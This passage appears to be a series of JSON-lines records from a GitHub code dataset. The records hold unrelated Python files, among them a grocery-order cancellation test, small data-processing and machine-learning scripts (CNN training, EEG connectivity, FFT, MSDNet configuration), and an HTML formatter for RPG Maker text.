taxi_grocery_orders,\n pgsql,\n processing,\n grocery_depots,\n grocery_cart,\n order_status,\n response_status,\n create_event,\n cancel_order_reason,\n):\n order = models.Order(\n pgsql=pgsql,\n status=order_status,\n grocery_flow_version=PROCESSING_FLOW_VERSION,\n )\n\n grocery_cart.set_cart_data(cart_id=order.cart_id)\n grocery_depots.add_depot(legacy_depot_id=order.depot_id)\n\n response = await taxi_grocery_orders.post(\n '/orders/v1/integration-api/v1/actions/cancel',\n json={'order_id': order.order_id, 'reason': cancel_order_reason},\n )\n\n assert response.status_code == response_status\n order.update()\n\n events = list(processing.events(scope='grocery', queue='processing'))\n if create_event:\n assert len(events) == 1\n\n cancel_reason_message = 'Got cancel request from user'\n\n assert events[0].payload == {\n 'reason': 'cancel',\n 'cancel_reason_type': 'user_request',\n 'payload': {\n 'event_created': consts.NOW,\n 'initial_event_created': consts.NOW,\n },\n 'cancel_reason_message': cancel_reason_message,\n 'order_id': order.order_id,\n 'flow_version': PROCESSING_FLOW_VERSION,\n 'times_called': 0,\n }\n assert order.desired_status == 'canceled'\n else:\n assert not events\n assert order.desired_status is None\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_grocery_orders/test_integration_api_actions_cancel.py","file_name":"test_integration_api_actions_cancel.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21666794909","text":"#!usr/bin/env python3\ngenes={}\nseq_read=open(\"Python_06.seq.txt\",\"r\")\nfor line in seq_read:\n line=line.rstrip()\n gene_id,seq=line.split()\n genes[gene_id]=seq\nprint(genes)\n\n\n","repo_name":"aparnamt/aparna","sub_path":"python_06.seq.py","file_name":"python_06.seq.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3264658382","text":"import torch\nfrom torchvision import transforms as T\nfrom PIL import Image\nimport os\nimport numpy as np\nimport cv2\nimport timeit\n\n\n# datasets = SIP , DUT-RGBD , NLPR , NJU2K\nmodel_path = os.path.join('TrainedModels\\\\DDNet_500Model.pt')\nmodel = torch.load(model_path)\nmodel.eval()\nkernel = np.ones((5,5), np.uint8)\n\ndef preprocess_image(img):\n transform = T.Compose([T.Resize((224, 224)), T.ToTensor()])\n x = transform(img)\n x = torch.unsqueeze(x, 0)\n x = x.cuda(0)\n return x\ndef predictions(img):\n\n x = preprocess_image(img)\n start_time = timeit.default_timer()\n output = model(x)\n output = torch.squeeze(output, 0)\n\n output = output.detach().cpu().numpy()\n output = output.dot(255)\n output *= output.max()/255.0\n # print (max(output))\n # output = cv2.erode(output, kernel, iterations=2)\n # output = cv2.dilate(output, kernel, iterations=1)\n return output\n\ndef testing_code_dir(input_dir, output_dir):\n\n val_base_path_images = os.listdir(input_dir)\n for single_image in val_base_path_images:\n full_path = input_dir + single_image\n\n img = Image.open(full_path).convert(\"RGB\")\n\n output = predictions(img)\n output = np.transpose(output, (1, 2, 0))\n # cv2.imshow('', output)\n # cv2.waitKey(50)\n\n output_path = output_dir + single_image[0:(len(single_image) - 3)] + \"png\"\n cv2.imwrite(output_path, output)\n print(\"Reading: %s\\n writing: %s \" % (full_path, output_path))\n\n# # testing code SIP\ninput_dir = r'D:\\My Research\\Datasets\\Saliency Detection\\RGBD\\SIP\\Test\\Images\\\\'\noutput_dir = r'C:\\Users\\user02\\Documents\\GitHub\\EfficientSOD\\SIP\\\\'\ntesting_code_dir(input_dir,output_dir)\n","repo_name":"tanveer-hussain/EfficientSOD","sub_path":"Testing.py","file_name":"Testing.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"66"} +{"seq_id":"40968876460","text":"import sys\nfrom matplotlib import pyplot\nfrom numpy.lib.npyio import load\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dropout\nfrom tensorflow.keras.optimizers import SGD\nimport os\nimport cv2\nimport glob \nimport numpy as np\nfrom PIL import Image\n\n# load train and test dataset\ndef load_dataset():\n\t# load dataset\n sys.path.append('./cs231n')\n from data_utils import load_CIFAR10\n cifar10_dir = './cs231n/datasets/cifar-10-batches-py'\n \n trainX, trainY, testX, testY = load_CIFAR10(cifar10_dir) \n\t#(trainX, trainY), (testX, testY) = cifar10.load_data()\n\t# one hot encode target values\n trainY = to_categorical(trainY)\n testY = to_categorical(testY)\n return trainX, trainY, testX, testY\n\n# scale pixels\ndef prep_pixels(train, test):\n\t# convert from integers to floats\n\ttrain_norm = train.astype('float32')\n\ttest_norm = test.astype('float32')\n\t# normalize to range 0-1\n\ttrain_norm = train_norm / 255.0\n\ttest_norm = test_norm / 255.0\n\t# return normalized images\n\treturn train_norm, test_norm\n \n\ndef define_model_one_VGG_block():\n model = Sequential()\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(MaxPooling2D((2, 2)))\n model.add(Flatten())\n model.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(10, activation='softmax'))\n # compile model\n opt = SGD(learning_rate=0.001, momentum=0.9)\n model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n return model\n\ndef define_model_two_VGG_blocks():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n\tmodel.add(Dense(10, activation='softmax'))\n\t# compile model\n\topt = SGD(learning_rate=0.001, momentum=0.9)\n\tmodel.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n\treturn model\n\ndef define_model_three_VGG_blocks():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n\tmodel.add(Dense(10, activation='softmax'))\n\t# compile model\n\topt = SGD(learning_rate=0.001, momentum=0.9)\n\tmodel.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n\treturn model\n\n# define cnn model\ndef define_model_with_dropout_reg_three_VGG_blocks(drop_out_rate_first_block, drop_out_rate_second_block, drop_out_rate_third_block):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(MaxPooling2D((2, 2)))\n model.add(Dropout(drop_out_rate_first_block))\n model.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(MaxPooling2D((2, 2)))\n model.add(Dropout(drop_out_rate_second_block))\n model.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n model.add(MaxPooling2D((2, 2)))\n model.add(Dropout(drop_out_rate_third_block))\n model.add(Flatten())\n model.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n model.add(Dropout(0.2))\n model.add(Dense(10, activation='softmax'))\n # compile model\n opt = SGD(learning_rate=0.001, momentum=0.9)\n model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n return model\n \n# plot diagnostic learning curves\ndef summarize_diagnostics(filename, history):\n\t# plot loss\n pyplot.subplot(211)\n pyplot.title('Cross Entropy Loss')\n pyplot.plot(history.history['loss'], color='blue', label='train')\n pyplot.plot(history.history['val_loss'], color='orange', label='test')\n # plot accuracy\n pyplot.subplot(212)\n pyplot.title('Classification Accuracy')\n pyplot.plot(history.history['accuracy'], color='blue', label='train')\n pyplot.plot(history.history['val_accuracy'], color='orange', label='test')\n # save plot to file\n # filename = sys.argv[0].split('/')[-1]\n pyplot.tight_layout()\n pyplot.savefig(filename + '_plot.png')\n pyplot.close()\n\ndef save_model(model, name):\n #Since we appended cs231\n sys.path.remove('../cs231n')\n model.save('./models/' + name)\n\ndef save_summed_results(details_about_model, acc):\n f = open(\"./results/summed_res.txt\", \"a\")\n f.write(details_about_model, \", Accuracy: \", acc)\n f.close()\n\n\n\ndef convert_images_to_arr(images):\n res = []\n\n for img in images:\n img = Image.open(img)\n rezised_img = img.resize((32, 32))\n data = np.asarray(rezised_img)\n res.append(data)\n\n return res\n\ndef load_images_from_folder(folder):\n res = []\n path = folder + \"/*.jpg\"\n for img in glob.glob(path):\n res.append(img)\n\n return convert_images_to_arr(res)\n\ndef load_medical_data():\n test_acne_x = load_images_from_folder('./skin_disease_data/test/Acne_and_Rosacea_Photos')\n test_acne_y = np.empty(len(test_acne_x))\n test_acne_y.fill(0)\n\n test_actinic_x = load_images_from_folder('./skin_disease_data/test/Actinic Keratosis Basal Cell Carcinoma and other Malignant Lesions')\n test_actinic_y = np.empty(len(test_actinic_x))\n test_actinic_y.fill(1)\n\n test_atopic_x = load_images_from_folder('./skin_disease_data/test/Atopic Dermatitis Photos')\n test_atopic_y = np.empty(len(test_atopic_x))\n test_atopic_y.fill(1)\n\n test_bullous_x = load_images_from_folder('./skin_disease_data/test/Bullous Disease Photos')\n test_bullous_y = np.empty(len(test_bullous_x))\n test_bullous_y.fill(1)\n\n test_cellulitis_x = load_images_from_folder('./skin_disease_data/test/Cellulitis Impetigo and other Bacterial Infections')\n test_cellulitis_y = np.empty(len(test_cellulitis_x))\n test_cellulitis_y.fill(1)\n\n test_eczema_x = load_images_from_folder('./skin_disease_data/test/Eczema Photos')\n test_eczema_y = np.empty(len(test_eczema_x))\n test_eczema_y.fill(1)\n\n test_exanthems_x = load_images_from_folder('./skin_disease_data/test/Exanthems and Drug Eruptions')\n test_exanthems_y = np.empty(len(test_exanthems_x))\n test_exanthems_y.fill(1)\n\n test_hair_loss_alopecia_x = load_images_from_folder('./skin_disease_data/test/Hair Loss Photos Alopecia and other Hair Diseases')\n test_hair_loss_alopecia_y = np.empty(len(test_hair_loss_alopecia_x))\n test_hair_loss_alopecia_y.fill(1)\n\n test_herpes_x = load_images_from_folder('./skin_disease_data/test/Herpes HPV and other STDs Photos')\n test_herpes_y = np.empty(len(test_herpes_x))\n test_herpes_y.fill(1)\n\n test_light_diseases_x = load_images_from_folder('./skin_disease_data/test/Light Diseases and Disorders of Pigmentation')\n test_light_diseases_y = np.empty(len(test_light_diseases_x))\n test_light_diseases_y.fill(1)\n\n test_lupus_x = load_images_from_folder('./skin_disease_data/test/Lupus and other Connective Tissue diseases')\n test_lupus_y = np.empty(len(test_lupus_x))\n test_lupus_y.fill(1)\n\n test_melanoma_x = load_images_from_folder('./skin_disease_data/test/Melanoma Skin Cancer Nevi and Moles')\n test_melanoma_y = np.empty(len(test_melanoma_x))\n test_melanoma_y.fill(1)\n \n test_nail_fungus_x = load_images_from_folder('./skin_disease_data/test/Nail Fungus and other Nail Disease')\n test_nail_fungus_y = np.empty(len(test_nail_fungus_x))\n test_nail_fungus_y.fill(1)\n\n test_poison_ivy_x = load_images_from_folder('./skin_disease_data/test/Poison Ivy Photos and other Contact Dermatitis')\n test_poison_ivy_y = np.empty(len(test_poison_ivy_x))\n test_poison_ivy_y.fill(1)\n\n test_psoriasis_x = load_images_from_folder('./skin_disease_data/test/Psoriasis pictures Lichen Planus and related diseases')\n test_psoriasis_y = np.empty(len(test_psoriasis_x))\n test_psoriasis_y.fill(1)\n\n test_scabies_lyme_x = load_images_from_folder('./skin_disease_data/test/Scabies Lyme Disease and other Infestations and Bites')\n test_scabies_lyme_y = np.empty(len(test_scabies_lyme_x))\n test_scabies_lyme_y.fill(1)\n\n test_seborrheic_keratoses_x = load_images_from_folder('./skin_disease_data/test/Seborrheic Keratoses and other Benign Tumors')\n test_seborrheic_keratoses_y = np.empty(len(test_seborrheic_keratoses_x))\n test_seborrheic_keratoses_y.fill(1)\n\n test_systemic_disease_x = load_images_from_folder('./skin_disease_data/test/Systemic Disease')\n test_systemic_disease_y = np.empty(len(test_systemic_disease_x))\n test_systemic_disease_y.fill(1)\n\n test_tinea_ringworm_x = load_images_from_folder('./skin_disease_data/test/Tinea Ringworm Candidiasis and other Fungal Infections')\n test_tinea_ringworm_y = np.empty(len(test_tinea_ringworm_x))\n test_tinea_ringworm_y.fill(1)\n\n test_urticaria_hives_x = load_images_from_folder('./skin_disease_data/test/Urticaria Hives')\n test_urticaria_hives_y = np.empty(len(test_urticaria_hives_x))\n test_urticaria_hives_y.fill(1)\n\n test_vascular_tumors_x = load_images_from_folder('./skin_disease_data/test/Vascular Tumors')\n test_vascular_tumors_y = np.empty(len(test_vascular_tumors_x))\n test_vascular_tumors_y.fill(1)\n\n test_vasculitis_x = load_images_from_folder('./skin_disease_data/test/Vasculitis Photos')\n test_vasculitis_y = np.empty(len(test_vasculitis_x))\n test_vasculitis_y.fill(1)\n\n test_warts_molluscum_x = load_images_from_folder('./skin_disease_data/test/Warts Molluscum and other Viral Infections')\n test_warts_molluscum_y = np.empty(len(test_warts_molluscum_x))\n test_warts_molluscum_y.fill(1)\n\n \n # acneY = #Np.array af samme længde, og med værdi 1 for hver\n return convert_images_to_arr(acne)\n \ndef run_test_harness():\n\n load_medical_data()\n # sys.path.append('../skin_disease_data')\n # print(os.system(\"dir\"))\n # acne = load_medical_data()\n # print(type(acne))\n # print(acne.shape)\n\n a = \"\"\n\n # print(\" > Loading dataset...\")\n # trainX, trainY, testX, testY = load_dataset()\n # a = \"\"\n # print(\" > Preprocessing dataset...\")\n # trainX, testX = prep_pixels(trainX, testX)\n\n # print(\"Shapes:\")\n # print(\"Train xy: \", trainX.shape, \", \", trainY.shape)\n # print(\"Test xy: \", testX.shape, \", \", testY.shape)\n \n # print(\" > Dataset loaded...\")\n # print(\" > Defining model...\")\n # #model = define_model_one_VGG_block()\n # model = define_model_two_VGG_blocks()\n \n # print(\" > Fitting model...\")\n # history = model.fit(trainX, trainY, epochs=100, batch_size=64, validation_data=(testX, testY), verbose=0)\n # print(\" > Model finished fitting...\")\n\n # print(\" > Evaluating model...\")\n # _, acc = model.evaluate(testX, testY, verbose=0)\n # print(\" > Accuracy: \", '> %.3f' % (acc * 100.0))\n \n # print(\" > Summarizing diagnostics and saving model...\")\n # summarize_diagnostics('two_VGG_epoch100_batch64', history)\n # save_model(model, 'two_VGG_epoch100_batch64')\n # save_summed_results('two_VGG_epoch100_batch64', acc)\n \n# entry point, run the test harness\nrun_test_harness()","repo_name":"OskarSkak/healthcare_deep_learning","sub_path":"CNNs/StandAloneModel.py","file_name":"StandAloneModel.py","file_ext":"py","file_size_in_byte":12871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72644186130","text":"\"\"\"\n @author : macab (macab@debian)\n @file : countsetbits\n @created : Saturday Mar 30, 2019 18:59:20 IST\n\"\"\"\n\ndef countsetbits(n):\n count = 0\n while n > 0:\n count += 1\n n = n & (n - 1)\n return count\n\nprint(countsetbits(7))\n\n","repo_name":"macabdul9/python-learning","sub_path":"basics/countsetbits.py","file_name":"countsetbits.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9887642749","text":"import numpy as np\nimport pandas as pd\n\n#variables for training\ntrainingVariables = [\"var1\", \"var2\", \"var3\", \"VOI\"]\n\n#Class for generating toy data to demonstrate classifier decorrelation\nclass dataGenerator:\n def __init__(self):\n self.variableNames = [\"var1\", \"var2\", \"var3\", \"VOI\", \"isSignal\"]\n self.ranges = [(0.0, 1.0), (0.0, 1.0), (0.0, 300.0), (0.0, 300.0)]\n\n def getSignal(self, nSamples):\n # massPoints = [100, 250, 400, 550]\n massPoints = [250]\n\n width = 20\n df = pd.DataFrame(columns=self.variableNames+[\"massPoint\"])\n for point in massPoints:\n _nSamples = int(nSamples/len(massPoints))\n var1 = np.arcsin(np.random.uniform(self.ranges[0][0], self.ranges[0][1], _nSamples))\n var2 = np.random.uniform(self.ranges[1][0], self.ranges[1][1], _nSamples)\n VOI = np.random.normal(point, width, _nSamples)\n var3 = np.log(1.0+VOI.copy())\n massPoint = np.ones(_nSamples)*point\n isSignal = np.ones(_nSamples)\n dataframe = pd.DataFrame(data=np.column_stack((var1, var2, var3, VOI, isSignal, massPoint)), columns=self.variableNames+[\"massPoint\"])\n df = pd.concat([df, dataframe], axis=0)\n return df\n\n\n def getBackground(self, nSamples):\n var1 = np.arccos(np.random.uniform(self.ranges[0][0], self.ranges[0][1], nSamples))\n var2 = np.random.uniform(self.ranges[1][0], self.ranges[1][1], nSamples)\n VOI = np.random.exponential(300, nSamples)\n # VOI = np.random.uniform(0.0, 800.0, nSamples)\n # var3 = np.log(1.0+VOI)\n var3 = np.log(1.0+VOI.copy())\n isSignal = np.zeros(nSamples)\n massPoint = np.ones(nSamples)\n\n dataframe = pd.DataFrame(data=np.column_stack((var1, var2, var3, VOI, isSignal, massPoint)), columns=self.variableNames+[\"massPoint\"])\n return dataframe","repo_name":"hajohajo/toyModelDistanceDecorrelation","sub_path":"dataGenerator.py","file_name":"dataGenerator.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22629045572","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef f (x):\n\treturn (1)\n\nxmax = 500.0\nxmin = -500.0\n\nnpts = 256\ndelta = (xmax-xmin)/(npts-1)\t #define sample spacing\n\nxarray = np.zeros(npts)\nsdata = np.zeros(npts)\n\n\nfor i in range(npts):\n\tsdata[i]=f(xmin+i*delta)\n\txarray[i]=xmin+i*delta\n\t\n\t\t\n\nnft = (np.fft.fft(sdata,norm='ortho')) #performing DFT\nkarray = np.fft.fftfreq(npts, d=delta)\t\t#sampling the frequency\nkarray = 2*np.pi*karray\nfactor = np.exp(-1j*karray*xmin)\naft = delta*np.sqrt(npts/(2.0*np.pi))*factor*nft\t#Numerical fourier transform\n\nk=np.linspace(-8,8,npts)\nrkarr=np.asarray(k)\nrft= np.zeros(npts)\nfor i in range(0,npts):\n\tif(rkarr[i]>=-1 and rkarr[i]<=1):\t\t\n\t\trft[i]=np.sqrt(np.pi/2.0)\n\n#plt.plot(karray,aft,'-*',color='r')\n#plt.plot(rkarr,rft)\n#print(karray.shape)\n#plt.xlabel('k')\n#plt.ylabel('f(k)')\n#plt.show()\n","repo_name":"aritragon/Assignment3","sub_path":"q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21528399862","text":"import html\nfrom rpgmv import RpgLexer\n\nyttdColors = {\n\t0: \"#ffffff\",\n\t1: \"#20a0d6\",\n\t2: \"#ff784c\",\n\t3: \"#66cc40\",\n\t4: \"#99ccff\",\n\t5: \"#ccc0ff\",\n\t6: \"#ffffa0\",\n\t7: \"#808080\",\n\t8: \"#c0c0c0\",\n\t9: \"#2080cc\",\n\t10: \"#ff3810\",\n\t11: \"#00a010\",\n\t12: \"#3e9ade\",\n\t13: \"#a098ff\",\n\t14: \"#ffcc20\",\n\t15: \"#000000\",\n\t16: \"#84aaff\",\n\t17: \"#ffff40\",\n\t18: \"#ff2020\",\n\t19: \"#202040\",\n\t20: \"#e08040\",\n\t21: \"#f0c040\",\n\t22: \"#4080c0\",\n\t23: \"#40c0f0\",\n\t24: \"#80ff80\",\n\t25: \"#c08080\",\n\t26: \"#8080ff\",\n\t27: \"#ff80ff\",\n\t28: \"#00a040\",\n\t29: \"#00e060\",\n\t30: \"#a060e0\",\n\t31: \"#c080ff\"\n}\n\nclass HtmlFormatter:\n\tcolors = {}\n\tvariables = {}\n\tactorNames = {}\n\tpartyMemberNames = {}\n\ticons = {}\n\tcurrency = \"Yen\"\n\tdefaultFontSize = 12\n\tfontUnit = \"pt\"\n\n\tcolorSupplier = lambda self, v : self.colors[v]\n\tvariableSupplier = lambda self, v : self.variables[v]\n\tactorNameSupplier = lambda self, v : self.actorNames[v]\n\tpartyMemberSupplier = lambda self, v : self.partyMemberNames[v]\n\ticonSupplier = lambda self, v : self.icons[v]\n\n\toutput = \"\"\n\tisSpanOpen = False\n\tcurrentStyle = {}\n\n\tdef reset(self):\n\t\tself.output = \"\"\n\t\tself.isSpanOpen = False\n\t\tself.currentStyle = { \"font-size\": self.defaultFontSize, \"color\": self.colorSupplier(0) }\n\n\tdef serializeCss(self, params) -> str:\n\t\tcss = \"\"\n\n\t\tfor key in params:\n\t\t\tcss += key\n\t\t\tcss += \": \"\n\t\t\tcss += str(params[key])\n\t\t\tif key == \"font-size\":\n\t\t\t\tcss += self.fontUnit\n\t\t\tcss += \"; \"\n\n\t\treturn css.strip()\n\n\tdef applyStyle(self): # needs to be called at each text write\n\t\tif len(self.currentStyle) != 0:\n\t\t\tself.isSpanOpen = True\n\t\t\tself.output += f''\n\n\tdef doTheThing(self, tokens) -> str:\n\t\tfor t in tokens:\n\t\t\tif isinstance(t, RpgLexer.RPGText):\n\t\t\t\tself.applyStyle()\n\t\t\t\tself.output += html.escape(t.toFormattedText()).replace(\"\\n\", \"
    \")\n\t\t\telif isinstance(t, RpgLexer.RPGToken):\n\t\t\t\tif self.isSpanOpen:\n\t\t\t\t\tself.output += \"
    \"\n\t\t\t\t\tself.isSpanOpen = False\n\n\t\t\t\tif t.tag == \"C\":\n\t\t\t\t\tself.currentStyle[\"color\"] = self.colorSupplier(int(t.argument))\n\t\t\t\telif t.tag == \"V\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += self.variableSupplier(int(t.argument))\n\t\t\t\telif t.tag == \"N\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += self.actorNameSupplier(int(t.argument))\n\t\t\t\telif t.tag == \"O\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += self.partyMemberSupplier(int(t.argument))\n\t\t\t\telif t.tag == \"I\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += f'\"{t.argument}\"'\n\t\t\t\telif t.tag == \"G\":\n\t\t\t\t\tself.applyStyle()\n\t\t\t\t\tself.output += self.currency\n\t\t\t\telif t.tag == \"{\":\n\t\t\t\t\tif not \"font-size\" in self.currentStyle:\n\t\t\t\t\t\tself.currentStyle[\"font-size\"] = self.defaultFontSize\n\t\t\t\t\tself.currentStyle[\"font-size\"] += 1\n\t\t\t\telif t.tag == \"}\":\n\t\t\t\t\tif not \"font-size\" in self.currentStyle:\n\t\t\t\t\t\tself.currentStyle[\"font-size\"] = self.defaultFontSize\n\t\t\t\t\tself.currentStyle[\"font-size\"] -= 1\n\n\t\tif self.isSpanOpen:\n\t\t\tself.output += \"
    \"\n\t\treturn self.output\n","repo_name":"vinceh121/weblate-rpgmaker-mv","sub_path":"rpgmv/HtmlFormatter.py","file_name":"HtmlFormatter.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19970946282","text":"import os\r\nimport numpy as np\r\nimport connectivipy as cp\r\nfrom preprocess import preprocess\r\nfrom MEMD_all import memd\r\n\r\n'''\r\nKey Arguements:\r\n Function to get adjacency matrix corresponding to top 10 Effective connectivity estimated by Partial Directed Coherence\r\n'''\r\ndef PDC(filepath,index):\r\n\r\n y = preprocess(filepath,index)\r\n \r\n imf = memd(y)\r\n #returns a 3D matrix 'imf(M,N,L)' containing M multivariate IMFs, one IMF per column, computed by applying\r\n #the multivariate EMD algorithm on the N-variate signal (time-series) X of length L.\r\n \r\n '''\r\n IMF1 is shown to contain maximum information content among the estimated IMFs, hence taken.\r\n '''\r\n \r\n IMF1 = imf[0,:,:]\r\n \r\n model_coeff, reflection_matrix = cp.mvarmodel.Mvar.fit(IMF1, order = None, method = 'ns')\r\n PDC = cp.conn.pdc_fun(model_coeff,reflection_matrix,250,512)\r\n PDC = np.square(PDC)\r\n \r\n \r\n '''\r\n Out-in rates are calculated and corresponding ratios are estimated for all channels.\r\n '''\r\n \r\n delta = np.zeros((512,9)).astype(float)\r\n out_info = np.zeros((512,9)).astype(float)\r\n in_info = np.zeros((512,9)).astype(float)\r\n \r\n for f in range(512):\r\n for i in range(9):\r\n s = 0\r\n for j in range(9):\r\n s += PDC[f,j,i]\r\n out_info[f,i] = s\r\n r = 0\r\n for k in range(9):\r\n r = r + PDC[f,i,k]\r\n in_info[f,i] = r\r\n delta[f,i] = out_info[f][i]/in_info[f][i]\r\n \r\n '''\r\n Spectral points in the frequency range from [13-25](Beta Band) are taken to study effective connectivity.\r\n '''\r\n p = np.zeros((9,9))\r\n A = np.zeros((9,9))\r\n f = np.linspace(0,125,num = 512)\r\n count = 0\r\n for (ind,f) in enumerate(f):\r\n if f>=13 and f<=25:\r\n p = p + PDC[ind,:,:]\r\n count = count + 1\r\n if f>25:\r\n break\r\n p = p/count\r\n \r\n \r\n '''\r\n Top 10 ECs in the PDC are estimated and corresponding adjacency matrix is returned.\r\n '''\r\n \r\n ii = np.unravel_index(np.argsort(p.ravel())[-30:], p.shape)\r\n count = 0\r\n for i in range(30):\r\n if ii[1][29-i]!= ii[0][29-i]:\r\n A[ii[1][29-i]][ii[0][29-i]] = 1\r\n print(ii[0][29-i],ii[1][29-i])\r\n count = count + 1\r\n if count == 10:\r\n break\r\n \r\n return A\r\n","repo_name":"Sirish07/Effective-Connectivity-in-Brain-during-MI-tasks","sub_path":"PDC.py","file_name":"PDC.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"7890476535","text":"\ndef get_msd_test_hyperparameters():\n # Main\n model_type = \"msdnet\"\n n_epochs = 2\n gpu = -1\n\n # Network\n network_hyperparameters = get_network_hyperparameters(model_type)\n # Losses\n loss_hyperparameters = get_loss_hyperparameters(network_hyperparameters[\"n_exits\"], model_type)\n test_loss_hyperparameters = get_test_hyperparameters(network_hyperparameters[\"n_exits\"], model_type)\n # Train and Val \n loader_hyperparameters = get_loader_hyperparameters()\n # Optimizer and Scheduler\n opt_hyperparameters, sched_hyperparameters = get_opt_sched_hyperparameters()\n\n \n hyperparameters = dict(\n network = network_hyperparameters,\n loss = loss_hyperparameters,\n optimizer = opt_hyperparameters,\n scheduler = sched_hyperparameters,\n n_epochs = n_epochs,\n test_loss = test_loss_hyperparameters,\n gpu = gpu,\n loaders = loader_hyperparameters,\n )\n return hyperparameters\n\ndef get_network_hyperparameters(model_type):\n hyperparams = dict( # MSDNet architecture parameters\n call = 'MsdNet',\n in_shape = 32,\n out_dim = 100,\n n_scales = 3,\n n_exits = 3,\n nlayers_to_exit = 2,\n nlayers_between_exits = 2,\n nplanes_mulv = [2, 4, 8],\n nplanes_addh = 1,\n nplanes_init = 1,\n prune = \"min\",\n plane_reduction = 0, # Try this with 0 to avoid the halving\n exit_width = 128, # same as 128 dim 3x3 filters in exit?\n test_mode = True,\n dropout = \"block\",\n dropout_exit = True,\n dropout_p = 0.4,\n ) \n return hyperparams\n\ndef get_loss_hyperparameters(num_exits, model_type,loss_type = \"distillation_annealing\"):\n if model_type == \"msdnet\":\n if loss_type == \"distillation_annealing\":\n loss = dict( # distillation-based training with temperature\n # annealing\n call = 'DistillationBasedLoss',\n n_exits = num_exits,\n acc_tops = [1, 5],\n \n C = 0.5, # Confidence Limit (?)\n maxprob = 0.5, \n global_scale = 2.0 * 5/num_exits, # Not mentioned in paper\n # Temperature multiplier is 1.05 by default\n )\n elif loss_type == \"distillation_constant\":\n loss = dict( # distillation-based training with constant\n # temperature\n call = 'DistillationLossConstTemp',\n n_exits = num_exits,\n acc_tops = [1, 5],\n C = 0.5,\n T = 4.0,\n global_scale = 2.0 * 5/num_exits,\n )\n elif loss_type == \"classification\":\n loss = dict( # train with classification loss only\n call = 'ClassificationOnlyLoss',\n n_exits = num_exits,\n acc_tops = [1, 5],\n )\n else:\n # Add standard loss function stuff here\n pass\n return loss\n\ndef get_opt_sched_hyperparameters():\n 